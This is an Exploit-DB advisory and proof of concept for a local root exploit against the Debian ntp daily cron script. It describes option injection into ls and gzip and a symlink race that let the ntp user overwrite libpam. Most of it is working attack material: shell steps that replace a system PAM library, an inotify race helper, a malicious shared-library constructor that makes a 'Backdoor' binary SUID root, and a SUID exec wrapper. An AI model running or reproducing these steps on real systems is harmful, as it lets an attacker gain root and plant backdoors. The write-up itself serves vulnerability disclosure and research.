NTP - Local Privilege Escalation

EDB-ID:

41764

Author:

halfdog

Type:

local

Platform:

Linux

Published:

2016-01-21

Source: http://www.halfdog.net/Security/2015/NtpCronjobUserNtpToRootPrivilegeEscalation/

## Introduction

### Problem description:
The cronjob script bundled with ntp package is intended to perform cleanup on statistics files produced by NTP daemon running with statistics enabled. The script is run as root during the daily cronjobs all operations on the ntp-user controlled statistics directory without switching to user ntp. Thus all steps are performed with root permissions in place.

Due to multiple bugs in the script, a malicious ntp user can make the backup process to overwrite arbitrary files with content controlled by the attacker, thus gaining root privileges. The problematic parts in /etc/cron.daily/ntp are:

find "$statsdir" -type f -mtime +7 -exec rm {} \;

# compress whatever is left to save space
cd "$statsdir"
ls *stats.???????? > /dev/null 2>&1
if [ $? -eq 0 ]; then
  # Note that gzip won't compress the file names that
  # are hard links to the live/current files, so this
  # compresses yesterday and previous, leaving the live
  # log alone.  We supress the warnings gzip issues
  # about not compressing the linked file.
  gzip --best --quiet *stats.???????? 

Relevant targets are:

- find and rm invocation is racy, symlinks on rm
- rm can be invoked with one attacker controlled option
- ls can be invoked with arbitrary number of attacker controlled command line options
- gzip can be invoked with arbitrary number of attacker controlled options

##  Methods

### Exploitation Goal: 
A sucessful attack should not be mitigated by symlink security restrictions. Thus the general POSIX/Linux design weakness of missing flags/syscalls for safe opening of path without the setfsuid workaround has to be targeted. See FilesystemRecursionAndSymlinks (http://www.halfdog.net/Security/2010/FilesystemRecursionAndSymlinks/) on that.

### Demonstration: 
First step is to pass the ls check in the script to trigger gzip, which is more suitable to perform file system changes than ls for executing arbitrary code. As this requires passing command line options to gzip which are not valid for ls, content of statsdir has to be modified exactly in between. This can be easily accomplished by preparing suitable entries in /var/lib/ntp and starting one instance of DirModifyInotify.c (http://www.halfdog.net/Misc/Utils/DirModifyInotify.c) as user ntp:

cd /var/lib/ntp
mkdir astats.01234567 bstats.01234567
# Copy away library, we will have to restore it afterwards. Without
# that, login is disabled on console, via SSH, ...
cp -a -- /lib/x86_64-linux-gnu/libpam.so.0.83.1 .
gzip < /lib/x86_64-linux-gnu/libpam.so.0.83.1 > astats.01234567/libpam.so.0.83.1stats.01234567
./DirModifyInotify --Watch bstats.01234567 --WatchCount 5 --MovePath bstats.01234567 --MoveTarget -drfSstats.01234567 &

With just that in place, DirModifyInotify will react to the actions of ls, move the directory and thus trigger recursive decompression in gzip instead of plain compression. While gzip is running, the directory astats.01234567 has to replaced also to make it overwrite arbitrary files as user root. As gzip will attempt to restore uid/gid of compressed file to new uncompressed version, this will just change the ownership of PAM library to ntp user.

./DirModifyInotify --Watch astats.01234567 --WatchCount 12 --MovePath astats.01234567 --MoveTarget disabled --LinkTarget /lib/x86_64-linux-gnu/

After the daily cron jobs were run once, libpam.so.0.83.1 can be temporarily replaced, e.g. to create a SUID binary for escalation.

LibPam.c (http://www.halfdog.net/Security/2015/NtpCronjobUserNtpToRootPrivilegeEscalation/LibPam.c)
SuidExec.c (http://www.halfdog.net/Misc/Utils/SuidExec.c)

gcc -Wall -fPIC -c LibPam.c
ld -shared -Bdynamic LibPam.o -L/lib -lc -o libPam.so
cat libPam.so > /lib/x86_64-linux-gnu/libpam.so.0.83.1
gcc -o Backdoor SuidExec.c
/bin/su
# Back to normal
./Backdoor /bin/sh -c 'cp --preserve=mode,timestamps -- libpam.so.0.83.1 /lib/x86_64-linux-gnu/libpam.so.0.83.1; chown root.root /lib/x86_64-linux-gnu/libpam.so.0.83.1; exec /bin/sh'


--- DirModifyInotify.c ---
/** This program waits for notify of file/directory to replace
 *  given directory with symlink.
 *
 *  Usage: DirModifyInotify --Watch [watchfile0] --WatchCount [num]
 *      --MovePath [path] --MoveTarget [path] --LinkTarget [path] --Verbose
 *
 *  Parameters:
 *  * --MoveTarget: If set, move path to that target location before
 *    attempting to symlink.
 *  * --LinkTarget: If set, the MovePath is replaced with link to
 *    this path
 *
 *  Compile:
 *  gcc -o DirModifyInotify DirModifyInotify.c
 *
 *  Copyright (c) 2010-2016 halfdog <me (%) halfdog.net>
 *  
 *  This software is provided by the copyright owner "as is" to
 *  study it but without any expressed or implied warranties, that
 *  this software is fit for any other purpose. If you try to compile
 *  or run it, you do it solely on your own risk and the copyright
 *  owner shall not be liable for any direct or indirect damage
 *  caused by this software.
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char **argv) {
  char	*movePath=NULL;
  char	*newDirName=NULL;
  char	*symlinkTarget=NULL;

  int	argPos;
  int	handle;
  int	inotifyHandle;
  int	inotifyDataSize=sizeof(struct inotify_event)*16;
  struct inotify_event *inotifyData;
  int	randomVal;
  int	callCount;
  int	targetCallCount=0;
  int	verboseFlag=0;
  int	result;

  if(argc<4) return(1);
  inotifyHandle=inotify_init();

  for(argPos=1; argPos<argc; argPos++) {
    if(!strcmp(argv[argPos], "--Verbose")) {
      verboseFlag=1;
      continue;
    }

    if(!strcmp(argv[argPos], "--LinkTarget")) {
      argPos++;
      if(argPos==argc) return(1);
      symlinkTarget=argv[argPos];
      continue;
    }

    if(!strcmp(argv[argPos], "--MovePath")) {
      argPos++;
      if(argPos==argc) return(1);
      movePath=argv[argPos];
      continue;
    }

    if(!strcmp(argv[argPos], "--MoveTarget")) {
      argPos++;
      if(argPos==argc) return(1);
      newDirName=argv[argPos];
      continue;
    }

    if(!strcmp(argv[argPos], "--Watch")) {
      argPos++;
      if(argPos==argc) return(1);
//IN_ALL_EVENTS, IN_CLOSE_WRITE|IN_CLOSE_NOWRITE, IN_OPEN|IN_ACCESS
      result=inotify_add_watch(inotifyHandle, argv[argPos], IN_ALL_EVENTS);
      if(result==-1) {
        fprintf(stderr, "Failed to add watch path %s, error %d\n",
            argv[argPos], errno);
        return(1);
      }
      continue;
    }

    if(!strcmp(argv[argPos], "--WatchCount")) {
      argPos++;
      if(argPos==argc) return(1);
      targetCallCount=atoi(argv[argPos]);
      continue;
    }

    fprintf(stderr, "Unknown option %s\n", argv[argPos]);
    return(1);
  }

  if(!movePath) {
    fprintf(stderr, "No move path specified!\n" \
        "Usage: DirModifyInotify.c --Watch [watchfile0] --MovePath [path]\n" \
        "    --LinkTarget [path]\n");
    return(1);
  }

  fprintf(stderr, "Using target call count %d\n", targetCallCount);

// Init name of new directory if not already defined.
  if(!newDirName) {
    newDirName=(char*)malloc(strlen(movePath)+256);
    sprintf(newDirName, "%s-moved", movePath);
  }
  inotifyData=(struct inotify_event*)malloc(inotifyDataSize);

  for(callCount=0; ; callCount++) {
    result=read(inotifyHandle, inotifyData, inotifyDataSize);
    if(callCount==targetCallCount) {
      rename(movePath, newDirName);
//      rmdir(movePath);
      if(symlinkTarget) symlink(symlinkTarget, movePath);
      fprintf(stderr, "Move triggered at count %d\n", callCount);
      break;
    }
    if(verboseFlag) {
      fprintf(stderr, "Received notify %d, result %d, error %s\n",
          callCount, result, (result<0?strerror(errno):NULL));
    }
    if(result<0) {
      break;
    }
  }
  return(0);
}
--- EOF ---

--- LibPam.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2015 halfdog <me (%) halfdog.net>
 *  See http://www.halfdog.net/Misc/Utils/ for more information.
 *
 *  This library just transforms an existing file into a SUID
 *  binary when the library is loaded.
 * 
 *  gcc -Wall -fPIC -c LibPam.c
 *  ld -shared -Bdynamic LibPam.o -L/lib -lc -o libPam.so
 */

#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/** Library initialization function, called by the linker. If not
 *  named _init, parameter has to be set during linking using -init=name
 */
extern void _init() {
  fprintf(stderr, "LibPam.c: Within _init\n");
  chown("/var/lib/ntp/Backdoor", 0, 0);
  chmod("/var/lib/ntp/Backdoor", 04755);
}
--- EOF ---

--- SuidExec.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2015 halfdog <me (%) halfdog.net>
 *  See http://www.halfdog.net/Misc/Utils/ for more information.
 *
 *  This tool changes to uid/gid 0 and executes the program supplied
 *  via arguments.
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>

extern char **environ;

int main(int argc, char **argv) {
  if(argc<2) {
    fprintf(stderr, "Usage: %s [execargs]\n", argv[0]);
    return(1);
  }

  int rUid, eUid, sUid, rGid, eGid, sGid;
  getresuid(&rUid, &eUid, &sUid);
  getresgid(&rGid, &eGid, &sGid);
  if(setresuid(sUid, sUid, rUid)) {
    fprintf(stderr, "Failed to set uids\n");
    return(1);
  }
  if(setresgid(sGid, sGid, rGid)) {
    fprintf(stderr, "Failed to set gids\n");
    return(1);
  }

  execve(argv[1], argv+1, environ);

  return(1);
}
--- EOF ---